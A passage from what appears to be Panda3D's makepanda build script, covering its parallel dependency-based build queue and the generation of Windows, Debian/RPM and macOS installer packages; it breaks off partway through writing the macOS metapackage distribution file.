CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".png")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".rgb")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".rgba")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".jpg")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".png")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".rgb")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".rgba")
#
# Build the rtdist.
#
if (RTDIST):
OPTS=['DIR:direct/src/p3d']
TargetAdd('_panda3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('_coreapi', opts=OPTS, input='coreapi.pdef')
TargetAdd('_thirdparty', opts=OPTS, input='thirdparty.pdef')
#
# If we have a host URL and distributor, we can make .p3d deployment tools.
#
if not PkgSkip("DIRECT") and not PkgSkip("DEPLOYTOOLS") and not RUNTIME and not RTDIST and HOST_URL and DISTRIBUTOR:
OPTS=['DIR:direct/src/p3d']
TargetAdd('packp3d.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('pdeploy.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('pmerge.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('ppackage.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('ppatcher.p3d', opts=OPTS, input='panda3d.pdef')
##########################################################################################
#
# Dependency-Based Distributed Build System.
#
##########################################################################################
DEPENDENCYQUEUE=[]
for target in TARGET_LIST:
name = target.name
inputs = target.inputs
opts = target.opts
deps = target.deps
DEPENDENCYQUEUE.append([CompileAnything, [name, inputs, opts], [name], deps, []])
def BuildWorker(taskqueue, donequeue):
while True:
try:
task = taskqueue.get(timeout=1)
except:
ProgressOutput(None, "Waiting for tasks...")
task = taskqueue.get()
sys.stdout.flush()
if (task == 0): return
try:
task[0](*task[1])
donequeue.put(task)
except:
donequeue.put(0)
def AllSourcesReady(task, pending):
sources = task[3]
for x in sources:
if (x in pending):
return 0
sources = task[1][1]
for x in sources:
if (x in pending):
return 0
altsources = task[4]
for x in altsources:
if (x in pending):
return 0
return 1
def ParallelMake(tasklist):
# Create the communication queues.
donequeue = queue.Queue()
taskqueue = queue.Queue()
# Build up a table listing all the pending targets
#task = [CompileAnything, [name, inputs, opts], [name], deps, []]
# task[2] = [name]
# task[3] = deps
# The python tool package, in particular fltegg seems to throw parallelmake off
# A hack for now is to divide the tasklist into two parts, one to be built in parallel
# and another subpart to be built sequentially. The most time consuming part of the process
# is the c++ code generation anyways.
tasklist_seq = []
i = 0
while i < len(tasklist):
if tasklist[i][2][0].endswith('.egg') | tasklist[i][2][0].endswith('.egg.pz'):
break
i += 1
if i < len(tasklist):
tasklist_seq = tasklist[i:]
tasklist = tasklist[:i]
iNumStartingTasks = len(tasklist)
pending = {}
for task in tasklist:
for target in task[2]:
pending[target] = 1
# Create the workers
for slave in range(THREADCOUNT):
th = threading.Thread(target=BuildWorker, args=[taskqueue, donequeue])
th.setDaemon(1)
th.start()
# Feed tasks to the workers.
tasksqueued = 0
while True:
if (tasksqueued < THREADCOUNT):
extras = []
for task in tasklist:
if (tasksqueued < THREADCOUNT) and (AllSourcesReady(task, pending)):
if (NeedsBuild(task[2], task[3])):
tasksqueued += 1
taskqueue.put(task)
else:
for target in task[2]:
del pending[target]
else:
extras.append(task)
tasklist = extras
sys.stdout.flush()
if (tasksqueued == 0): break
donetask = donequeue.get()
if (donetask == 0):
exit("Build process aborting.")
sys.stdout.flush()
tasksqueued -= 1
JustBuilt(donetask[2], donetask[3])
for target in donetask[2]:
del pending[target]
# Kill the workers.
for slave in range(THREADCOUNT):
taskqueue.put(0)
# Make sure there aren't any unsatisfied tasks
if len(tasklist) > 0:
exit("Dependency problems: " + str(len(tasklist)) + " tasks not finished. First task unsatisfied: "+str(tasklist[0][2]))
SequentialMake(tasklist_seq)
def SequentialMake(tasklist):
i = 0
for task in tasklist:
if (NeedsBuild(task[2], task[3])):
task[0](*task[1] + [(i * 100.0) / len(tasklist)])
JustBuilt(task[2], task[3])
i += 1
def RunDependencyQueue(tasklist):
if (THREADCOUNT!=0):
ParallelMake(tasklist)
else:
SequentialMake(tasklist)
try:
RunDependencyQueue(DEPENDENCYQUEUE)
except:
SaveDependencyCache()
raise
# Run the test suite.
if RUNTESTS:
cmdstr = BracketNameWithQuotes(SDK["PYTHONEXEC"].replace('\\', '/'))
if sys.version_info >= (2, 6):
cmdstr += " -B"
cmdstr += " -m pytest tests"
if GetVerbose():
cmdstr += " --verbose"
oscmd(cmdstr)
##########################################################################################
#
# The Installers
#
# Under windows, we can build an 'exe' package using NSIS
# Under linux, we can build a 'deb' package or an 'rpm' package.
# Under OSX, we can make a 'dmg' package.
#
##########################################################################################
def MakeInstallerNSIS(file, title, installdir):
if (os.path.isfile(file)):
os.remove(file)
elif (os.path.isdir(file)):
shutil.rmtree(file)
if GetTargetArch() == 'x64':
regview = '64'
else:
regview = '32'
if (RUNTIME):
# Invoke the make_installer script.
AddToPathEnv("PATH", GetOutputDir() + "\\bin")
AddToPathEnv("PATH", GetOutputDir() + "\\plugins")
cmd = sys.executable + " -B -u " + os.path.join("direct", "src", "plugin_installer", "make_installer.py")
cmd += " --version %s --regview %s" % (VERSION, regview)
if GetTargetArch() == 'x64':
cmd += " --install \"$PROGRAMFILES64\\Panda3D\" "
else:
cmd += " --install \"$PROGRAMFILES32\\Panda3D\" "
oscmd(cmd)
shutil.move(os.path.join("direct", "src", "plugin_installer", "p3d-setup.exe"), file)
return
print("Building "+title+" installer at %s" % (file))
if (COMPRESSOR != "lzma"):
print("Note: you are using zlib, which is faster, but lzma gives better compression.")
if (os.path.exists("nsis-output.exe")):
os.remove("nsis-output.exe")
WriteFile(GetOutputDir()+"/tmp/__init__.py", "")
nsis_defs = {
'COMPRESSOR' : COMPRESSOR,
'TITLE' : title,
'INSTALLDIR' : installdir,
'OUTFILE' : '..\\' + file,
'BUILT' : '..\\' + GetOutputDir(),
'SOURCE' : '..',
'PYVER' : SDK["PYTHONVERSION"][6:9],
'REGVIEW' : regview,
}
if GetHost() == 'windows':
cmd = os.path.join(GetThirdpartyBase(), 'win-nsis', 'makensis') + ' /V2'
for item in nsis_defs.items():
cmd += ' /D%s="%s"' % item
else:
cmd = 'makensis -V2'
for item in nsis_defs.items():
cmd += ' -D%s="%s"' % item
cmd += ' "makepanda\installer.nsi"'
oscmd(cmd)
def MakeDebugSymbolArchive(zipname, dirname):
import zipfile
zip = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)
for fn in glob.glob(os.path.join(GetOutputDir(), 'bin', '*.pdb')):
zip.write(fn, dirname + '/bin/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'panda3d', '*.pdb')):
zip.write(fn, dirname + '/panda3d/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'plugins', '*.pdb')):
zip.write(fn, dirname + '/plugins/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'python', '*.pdb')):
zip.write(fn, dirname + '/python/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'python', 'DLLs', '*.pdb')):
zip.write(fn, dirname + '/python/DLLs/' + os.path.basename(fn))
zip.close()
INSTALLER_DEB_FILE="""
Package: panda3dMAJOR
Version: VERSION
Section: libdevel
Priority: optional
Architecture: ARCH
Essential: no
Depends: DEPENDS
Recommends: RECOMMENDS
Suggests: panda3d-runtime
Provides: panda3d
Conflicts: panda3d
Replaces: panda3d
Maintainer: rdb <me@rdb.name>
Installed-Size: INSTSIZE
Description: Panda3D free 3D engine SDK
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
.
This package contains the SDK for development with Panda3D, install panda3d-runtime for the runtime files.
"""
RUNTIME_INSTALLER_DEB_FILE="""
Package: panda3d-runtime
Version: VERSION
Section: web
Priority: optional
Architecture: ARCH
Essential: no
Depends: DEPENDS
Provides: panda3d-runtime
Maintainer: rdb <me@rdb.name>
Installed-Size: INSTSIZE
Description: Runtime binary and browser plugin for the Panda3D Game Engine
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d file.
"""
# We're not putting "python" in the "Requires" field,
# since the rpm-based distros don't have a common
# naming for the Python package.
INSTALLER_SPEC_FILE="""
Summary: The Panda3D free 3D engine SDK
Name: panda3d
Version: VERSION
Release: RPMRELEASE
License: BSD License
Group: Development/Libraries
BuildRoot: PANDASOURCE/targetroot
%description
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
This package contains the SDK for development with Panda3D, install panda3d-runtime for the runtime files.
%post
/sbin/ldconfig
%postun
/sbin/ldconfig
%files
%defattr(-,root,root)
/etc/Confauto.prc
/etc/Config.prc
/usr/share/panda3d
/etc/ld.so.conf.d/panda3d.conf
/usr/%_lib/panda3d
""" + PYTHON_SITEPACKAGES + """
/usr/include/panda3d
"""
if not PkgSkip("PVIEW"):
INSTALLER_SPEC_FILE += \
"""/usr/share/applications/pview.desktop
/usr/share/mime-info/panda3d.mime
/usr/share/mime-info/panda3d.keys
/usr/share/mime/packages/panda3d.xml
/usr/share/application-registry/panda3d.applications
"""
RUNTIME_INSTALLER_SPEC_FILE="""
Summary: Runtime binary and browser plugin for the Panda3D Game Engine
Name: panda3d-runtime
Version: VERSION
Release: RPMRELEASE
License: BSD License
Group: Productivity/Graphics/Other
BuildRoot: PANDASOURCE/targetroot
%description
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d file.
%files
%defattr(-,root,root)
/usr/bin/panda3d
/usr/%_lib/nppanda3d.so
/usr/%_lib/mozilla/plugins/nppanda3d.so
/usr/%_lib/mozilla-firefox/plugins/nppanda3d.so
/usr/%_lib/xulrunner-addons/plugins/nppanda3d.so
/usr/share/mime-info/panda3d-runtime.mime
/usr/share/mime-info/panda3d-runtime.keys
/usr/share/mime/packages/panda3d-runtime.xml
/usr/share/application-registry/panda3d-runtime.applications
/usr/share/applications/*.desktop
"""
# plist file for Mac OSX
Info_plist = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>%(package_id)s</string>
<key>CFBundleShortVersionString</key>
<string>%(version)s</string>
<key>IFPkgFlagRelocatable</key>
<false/>
<key>IFPkgFlagAuthorizationAction</key>
<string>RootAuthorization</string>
<key>IFPkgFlagAllowBackRev</key>
<true/>
</dict>
</plist>
"""
# FreeBSD pkg-descr
INSTALLER_PKG_DESCR_FILE = """
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
This package contains the SDK for development with Panda3D, install panda3d-runtime for the runtime files.
WWW: https://www.panda3d.org/
"""
# FreeBSD pkg-descr
RUNTIME_INSTALLER_PKG_DESCR_FILE = """
Runtime binary and browser plugin for the Panda3D Game Engine
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d file.
WWW: https://www.panda3d.org/
"""
# FreeBSD PKG Manifest template file
INSTALLER_PKG_MANIFEST_FILE = """
name: NAME
version: VERSION
arch: ARCH
origin: ORIGIN
comment: "Panda3D free 3D engine SDK"
www: https://www.panda3d.org
maintainer: rdb <me@rdb.name>
prefix: /usr/local
flatsize: INSTSIZEMB
deps: {DEPENDS}
"""
def MakeInstallerLinux():
if not RUNTIME and not PkgSkip("PYTHON"):
PYTHONV = SDK["PYTHONVERSION"].rstrip('dmu')
else:
PYTHONV = "python"
PV = PYTHONV.replace("python", "")
# Clean and set up a directory to install Panda3D into
oscmd("rm -rf targetroot data.tar.gz control.tar.gz panda3d.spec")
oscmd("mkdir --mode=0755 targetroot")
dpkg_present = False
if os.path.exists("/usr/bin/dpkg-architecture") and os.path.exists("/usr/bin/dpkg-deb"):
dpkg_present = True
rpmbuild_present = False
if os.path.exists("/usr/bin/rpmbuild"):
rpmbuild_present = True
if dpkg_present and rpmbuild_present:
print("Warning: both dpkg and rpmbuild present.")
if dpkg_present:
# Invoke installpanda.py to install it into a temporary dir
lib_dir = GetDebLibDir()
if RUNTIME:
InstallRuntime(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=lib_dir)
else:
InstallPanda(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=lib_dir)
oscmd("chmod -R 755 targetroot/usr/share/panda3d")
oscmd("mkdir -m 0755 -p targetroot/usr/share/man/man1")
oscmd("install -m 0644 doc/man/*.1 targetroot/usr/share/man/man1/")
oscmd("dpkg --print-architecture > "+GetOutputDir()+"/tmp/architecture.txt")
pkg_arch = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
if (RUNTIME):
txt = RUNTIME_INSTALLER_DEB_FILE[1:]
else:
txt = INSTALLER_DEB_FILE[1:]
txt = txt.replace("VERSION", DEBVERSION).replace("ARCH", pkg_arch).replace("PV", PV).replace("MAJOR", MAJOR_VERSION)
txt = txt.replace("INSTSIZE", str(GetDirectorySize("targetroot") / 1024))
oscmd("mkdir --mode=0755 -p targetroot/DEBIAN")
oscmd("cd targetroot && (find usr -type f -exec md5sum {} ;) > DEBIAN/md5sums")
if (not RUNTIME):
oscmd("cd targetroot && (find etc -type f -exec md5sum {} ;) >> DEBIAN/md5sums")
WriteFile("targetroot/DEBIAN/conffiles","/etc/Config.prc\n")
WriteFile("targetroot/DEBIAN/postinst","#!/bin/sh\necho running ldconfig\nldconfig\n")
oscmd("cp targetroot/DEBIAN/postinst targetroot/DEBIAN/postrm")
# Determine the package name and the locations that
# dpkg-shlibdeps should look in for executables.
pkg_version = DEBVERSION
if RUNTIME:
pkg_name = "panda3d-runtime"
lib_pattern = "debian/%s/usr/%s/*.so" % (pkg_name, lib_dir)
else:
pkg_name = "panda3d" + MAJOR_VERSION
lib_pattern = "debian/%s/usr/%s/panda3d/*.so*" % (pkg_name, lib_dir)
bin_pattern = "debian/%s/usr/bin/*" % (pkg_name)
# dpkg-shlibdeps looks in the debian/{pkg_name}/DEBIAN/shlibs directory
# and also expects a debian/control file, so we create this dummy set-up.
oscmd("mkdir targetroot/debian")
oscmd("ln -s .. targetroot/debian/" + pkg_name)
WriteFile("targetroot/debian/control", "")
dpkg_shlibdeps = "dpkg-shlibdeps"
if GetVerbose():
dpkg_shlibdeps += " -v"
if RUNTIME:
# The runtime doesn't export any useful symbols, so just query the dependencies.
oscmd("cd targetroot && %(dpkg_shlibdeps)s -x%(pkg_name)s %(lib_pattern)s %(bin_pattern)s*" % locals())
depends = ReadFile("targetroot/debian/substvars").replace("shlibs:Depends=", "").strip()
recommends = ""
else:
pkg_name = "panda3d" + MAJOR_VERSION
pkg_dir = "debian/panda3d" + MAJOR_VERSION
# Generate a symbols file so that other packages can know which symbols we export.
oscmd("cd targetroot && dpkg-gensymbols -q -ODEBIAN/symbols -v%(pkg_version)s -p%(pkg_name)s -e%(lib_pattern)s" % locals())
# Library dependencies are required, binary dependencies are recommended.
# We explicitly exclude libphysx-extras since we don't want to depend on PhysX.
oscmd("cd targetroot && LD_LIBRARY_PATH=usr/%(lib_dir)s/panda3d %(dpkg_shlibdeps)s -Tdebian/substvars_dep --ignore-missing-info -x%(pkg_name)s -xlibphysx-extras %(lib_pattern)s" % locals())
oscmd("cd targetroot && LD_LIBRARY_PATH=usr/%(lib_dir)s/panda3d %(dpkg_shlibdeps)s -Tdebian/substvars_rec --ignore-missing-info -x%(pkg_name)s %(bin_pattern)s" % locals())
# Parse the substvars files generated by dpkg-shlibdeps.
depends = ReadFile("targetroot/debian/substvars_dep").replace("shlibs:Depends=", "").strip()
recommends = ReadFile("targetroot/debian/substvars_rec").replace("shlibs:Depends=", "").strip()
if PkgSkip("PYTHON")==0:
depends += ", " + PYTHONV
recommends += ", python-wxversion, python-profiler (>= " + PV + "), python-pmw, python-tk (>= " + PV + ")"
if PkgSkip("NVIDIACG")==0:
depends += ", nvidia-cg-toolkit"
# Write back the dependencies, and delete the dummy set-up.
txt = txt.replace("DEPENDS", depends.strip(', '))
txt = txt.replace("RECOMMENDS", recommends.strip(', '))
WriteFile("targetroot/DEBIAN/control", txt)
oscmd("rm -rf targetroot/debian")
# Package it all up into a .deb file.
oscmd("chmod -R 755 targetroot/DEBIAN")
oscmd("chmod 644 targetroot/DEBIAN/control targetroot/DEBIAN/md5sums")
if not RUNTIME:
oscmd("chmod 644 targetroot/DEBIAN/conffiles targetroot/DEBIAN/symbols")
oscmd("fakeroot dpkg-deb -b targetroot %s_%s_%s.deb" % (pkg_name, pkg_version, pkg_arch))
elif rpmbuild_present:
# Invoke installpanda.py to install it into a temporary dir
if RUNTIME:
InstallRuntime(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=GetRPMLibDir())
else:
InstallPanda(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=GetRPMLibDir())
oscmd("chmod -R 755 targetroot/usr/share/panda3d")
oscmd("rpm -E '%_target_cpu' > "+GetOutputDir()+"/tmp/architecture.txt")
ARCH = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
pandasource = os.path.abspath(os.getcwd())
if RUNTIME:
txt = RUNTIME_INSTALLER_SPEC_FILE[1:]
else:
txt = INSTALLER_SPEC_FILE[1:]
# Add the binaries in /usr/bin explicitly to the spec file
for base in os.listdir(GetOutputDir() + "/bin"):
txt += "/usr/bin/%s\n" % (base)
# Write out the spec file.
txt = txt.replace("VERSION", VERSION)
txt = txt.replace("RPMRELEASE", RPMRELEASE)
txt = txt.replace("PANDASOURCE", pandasource)
txt = txt.replace("PV", PV)
WriteFile("panda3d.spec", txt)
oscmd("fakeroot rpmbuild --define '_rpmdir "+pandasource+"' --buildroot '"+os.path.abspath("targetroot")+"' -bb panda3d.spec")
if (RUNTIME):
oscmd("mv "+ARCH+"/panda3d-runtime-"+VERSION+"-"+RPMRELEASE+"."+ARCH+".rpm .")
else:
oscmd("mv "+ARCH+"/panda3d-"+VERSION+"-"+RPMRELEASE+"."+ARCH+".rpm .")
oscmd("rm -rf "+ARCH, True)
else:
exit("To build an installer, either rpmbuild or dpkg-deb must be present on your system!")
def MakeInstallerOSX():
if (RUNTIME):
# Invoke the make_installer script.
AddToPathEnv("DYLD_LIBRARY_PATH", GetOutputDir() + "/plugins")
cmdstr = sys.executable + " "
if sys.version_info >= (2, 6):
cmdstr += "-B "
cmdstr += "direct/src/plugin_installer/make_installer.py --version %s" % VERSION
oscmd(cmdstr)
return
dmg_name = "Panda3D-" + VERSION
if not SDK["PYTHONVERSION"].startswith("python2."):
dmg_name += '-py' + SDK["PYTHONVERSION"][6:9]
dmg_name += ".dmg"
import compileall
if (os.path.isfile(dmg_name)): oscmd("rm -f %s" % dmg_name)
if (os.path.exists("dstroot")): oscmd("rm -rf dstroot")
if (os.path.exists("Panda3D-rw.dmg")): oscmd('rm -f Panda3D-rw.dmg')
oscmd("mkdir -p dstroot/base/Developer/Panda3D/lib")
oscmd("mkdir -p dstroot/base/Developer/Panda3D/etc")
oscmd("cp %s/etc/Config.prc dstroot/base/Developer/Panda3D/etc/Config.prc" % GetOutputDir())
oscmd("cp %s/etc/Confauto.prc dstroot/base/Developer/Panda3D/etc/Confauto.prc" % GetOutputDir())
oscmd("cp -R %s/models dstroot/base/Developer/Panda3D/models" % GetOutputDir())
oscmd("cp -R doc/LICENSE dstroot/base/Developer/Panda3D/LICENSE")
oscmd("cp -R doc/ReleaseNotes dstroot/base/Developer/Panda3D/ReleaseNotes")
oscmd("cp -R %s/Frameworks dstroot/base/Developer/Panda3D/Frameworks" % GetOutputDir())
if os.path.isdir(GetOutputDir()+"/plugins"):
oscmd("cp -R %s/plugins dstroot/base/Developer/Panda3D/plugins" % GetOutputDir())
# Libraries that shouldn't be in base, but are instead in other modules.
no_base_libs = ['libp3ffmpeg', 'libp3fmod_audio', 'libfmodex', 'libfmodexL']
for base in os.listdir(GetOutputDir()+"/lib"):
if not base.endswith(".a") and base.split('.')[0] not in no_base_libs:
libname = "dstroot/base/Developer/Panda3D/lib/" + base
# We really need to specify -R in order not to follow symlinks
# On OSX, just specifying -P is not enough to do that.
oscmd("cp -R -P " + GetOutputDir() + "/lib/" + base + " " + libname)
oscmd("mkdir -p dstroot/tools/Developer/Panda3D/bin")
oscmd("mkdir -p dstroot/tools/Developer/Tools")
oscmd("ln -s ../Panda3D/bin dstroot/tools/Developer/Tools/Panda3D")
oscmd("mkdir -p dstroot/tools/etc/paths.d")
# Trailing newline is important, works around a bug in OSX
WriteFile("dstroot/tools/etc/paths.d/Panda3D", "/Developer/Panda3D/bin\n")
oscmd("mkdir -m 0755 -p dstroot/tools/usr/local/share/man/man1")
oscmd("install -m 0644 doc/man/*.1 dstroot/tools/usr/local/share/man/man1/")
for base in os.listdir(GetOutputDir()+"/bin"):
binname = "dstroot/tools/Developer/Panda3D/bin/" + base
# OSX needs the -R argument to copy symbolic links correctly, it doesn't have -d. How weird.
oscmd("cp -R " + GetOutputDir() + "/bin/" + base + " " + binname)
if PkgSkip("PYTHON")==0:
PV = SDK["PYTHONVERSION"][6:9]
oscmd("mkdir -p dstroot/pythoncode/usr/local/bin")
oscmd("mkdir -p dstroot/pythoncode/Developer/Panda3D/panda3d")
oscmd("mkdir -p dstroot/pythoncode/Library/Python/%s/site-packages" % PV)
WriteFile("dstroot/pythoncode/Library/Python/%s/site-packages/Panda3D.pth" % PV, "/Developer/Panda3D")
oscmd("cp -R %s/pandac dstroot/pythoncode/Developer/Panda3D/pandac" % GetOutputDir())
oscmd("cp -R %s/direct dstroot/pythoncode/Developer/Panda3D/direct" % GetOutputDir())
oscmd("ln -s %s dstroot/pythoncode/usr/local/bin/ppython" % SDK["PYTHONEXEC"])
oscmd("cp -R %s/*.so dstroot/pythoncode/Developer/Panda3D/" % GetOutputDir(), True)
oscmd("cp -R %s/*.py dstroot/pythoncode/Developer/Panda3D/" % GetOutputDir(), True)
if os.path.isdir(GetOutputDir()+"/Pmw"):
oscmd("cp -R %s/Pmw dstroot/pythoncode/Developer/Panda3D/Pmw" % GetOutputDir())
compileall.compile_dir("dstroot/pythoncode/Developer/Panda3D/Pmw")
WriteFile("dstroot/pythoncode/Developer/Panda3D/direct/__init__.py", "")
for base in os.listdir("dstroot/pythoncode/Developer/Panda3D/direct"):
if ((base != "extensions") and (base != "extensions_native")):
compileall.compile_dir("dstroot/pythoncode/Developer/Panda3D/direct/"+base)
for base in os.listdir(GetOutputDir()+"/panda3d"):
if base.endswith('.py') or base.endswith('.so'):
libname = "dstroot/pythoncode/Developer/Panda3D/panda3d/" + base
# We really need to specify -R in order not to follow symlinks
# On OSX, just specifying -P is not enough to do that.
oscmd("cp -R -P " + GetOutputDir() + "/panda3d/" + base + " " + libname)
if not PkgSkip("FFMPEG"):
oscmd("mkdir -p dstroot/ffmpeg/Developer/Panda3D/lib")
oscmd("cp -R %s/lib/libp3ffmpeg.* dstroot/ffmpeg/Developer/Panda3D/lib/" % GetOutputDir())
#if not PkgSkip("OPENAL"):
# oscmd("mkdir -p dstroot/openal/Developer/Panda3D/lib")
# oscmd("cp -R %s/lib/libp3openal_audio.* dstroot/openal/Developer/Panda3D/lib/" % GetOutputDir())
if not PkgSkip("FMODEX"):
oscmd("mkdir -p dstroot/fmodex/Developer/Panda3D/lib")
oscmd("cp -R %s/lib/libp3fmod_audio.* dstroot/fmodex/Developer/Panda3D/lib/" % GetOutputDir())
oscmd("cp -R %s/lib/libfmodex* dstroot/fmodex/Developer/Panda3D/lib/" % GetOutputDir())
oscmd("mkdir -p dstroot/headers/Developer/Panda3D/lib")
oscmd("cp -R %s/include dstroot/headers/Developer/Panda3D/include" % GetOutputDir())
if os.path.isfile(GetOutputDir() + "/lib/libp3pystub.a"):
oscmd("cp -R -P %s/lib/libp3pystub.a dstroot/headers/Developer/Panda3D/lib/" % GetOutputDir())
if os.path.isdir("samples"):
oscmd("mkdir -p dstroot/samples/Developer/Examples/Panda3D")
oscmd("cp -R samples/* dstroot/samples/Developer/Examples/Panda3D/")
oscmd("chmod -R 0775 dstroot/*")
DeleteVCS("dstroot")
DeleteBuildFiles("dstroot")
# We need to be root to perform a chown. Bleh.
# Fortunately PackageMaker does it for us, on 10.5 and above.
#oscmd("chown -R root:admin dstroot/*", True)
oscmd("mkdir -p dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/")
oscmd("mkdir -p dstroot/Panda3D/Panda3D.mpkg/Contents/Resources/en.lproj/")
pkgs = ["base", "tools", "headers"]
if not PkgSkip("PYTHON"): pkgs.append("pythoncode")
if not PkgSkip("FFMPEG"): pkgs.append("ffmpeg")
#if not PkgSkip("OPENAL"): pkgs.append("openal")
if not PkgSkip("FMODEX"): pkgs.append("fmodex")
if os.path.isdir("samples"): pkgs.append("samples")
for pkg in pkgs:
identifier = "org.panda3d.panda3d.%s.pkg" % pkg
plist = open("/tmp/Info_plist", "w")
plist.write(Info_plist % { "package_id" : identifier, "version" : VERSION })
plist.close()
if not os.path.isdir("dstroot/" + pkg):
os.makedirs("dstroot/" + pkg)
if OSXTARGET and OSXTARGET <= (10, 5):
target = '--target %d.%d' % (OSXTARGET)
else:
target = ''
if os.path.exists("/usr/bin/pkgbuild"):
# This new package builder is used in Lion and above.
cmd = '/usr/bin/pkgbuild --identifier ' + identifier + ' --version ' + VERSION + ' --root dstroot/' + pkg + '/ dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg'
# In older versions, we use PackageMaker. Apple keeps changing its location.
elif os.path.exists("/Developer/usr/bin/packagemaker"):
cmd = '/Developer/usr/bin/packagemaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Applications/Xcode.app/Contents/Applications/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Applications/Xcode.app/Contents/Applications/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Developer/Tools/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Developer/Tools/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
elif os.path.exists("/Developer/Tools/packagemaker"):
cmd = '/Developer/Tools/packagemaker -build -f dstroot/' + pkg + '/ -p dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg -i /tmp/Info_plist'
elif os.path.exists("/Applications/PackageMaker.app/Contents/MacOS/PackageMaker"):
cmd = '/Applications/PackageMaker.app/Contents/MacOS/PackageMaker --info /tmp/Info_plist --version ' + VERSION + ' --out dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg ' + target + ' --domain system --root dstroot/' + pkg + '/ --no-relocate'
else:
exit("Neither pkgbuild nor PackageMaker could be found!")
oscmd(cmd)
if os.path.isfile("/tmp/Info_plist"):
oscmd("rm -f /tmp/Info_plist")
# Now that we've built all of the individual packages, build the metapackage.
dist = open("dstroot/Panda3D/Panda3D.mpkg/Contents/distribution.dist", "w")
dist.write('<?xml version="1.0" encoding="utf-8"?>\n')
dist.write('<installer-script minSpecVersion="1.000000" authoringTool="com.apple.PackageMaker" authoringToolVersion="3.0.3" authoringToolBuild="174">\n')
dist.write(' <title>Panda3D SDK %s</title>\n' % (VERSION))
dist.write(' <options customize="always" allow-external-scripts="no" rootVolumeOnly="false"/>\n')
dist.write(' <license language="en" mime-type="text/plain">%s</license>\n' % ReadFile("doc/LICENSE"))
dist.write(' <choices-outline>\n')
for pkg in pkgs:
dist.write(' <line choice="%s"/>\n' % (pkg))
dist.write(' </choices-outline>\n')
dist.write(' <choice id="base" title="Panda3D Base Installation" description="This package contains the Panda3D libraries, configuration files and models/textures that are needed to use Panda3D. Location: /Developer/Panda3D/" start_enabled="false">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.base.pkg"/>\n')
dist.write(' </choice>\n')
dist.write(' <choice id="tools" title="Tools" tooltip="Useful tools and model converters to help with Panda3D development" description="This package contains the various utilities that ship with Panda3D, including packaging tools, model converters, and many more. Location: /Developer/Panda3D/bin/">\n')
dist.write(' <pkg-ref id="org.panda3d.panda3d.tools.pkg"/>\n')
dist.write(' </choice>\n')
if not PkgSkip("PYTHON"):
